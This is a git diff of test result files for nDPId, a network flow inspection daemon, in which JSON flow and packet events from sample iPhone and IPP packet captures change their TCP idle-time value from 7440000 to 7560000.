-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -302,12 +302,12 @@ 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} diff --git a/test/results/ipp.pcap.out b/test/results/ipp.pcap.out index e22b9d416..478ef3e6b 100644 --- a/test/results/ipp.pcap.out +++ b/test/results/ipp.pcap.out 
@@ -1,23 +1,23 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ipp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1210953938216} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} -00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} 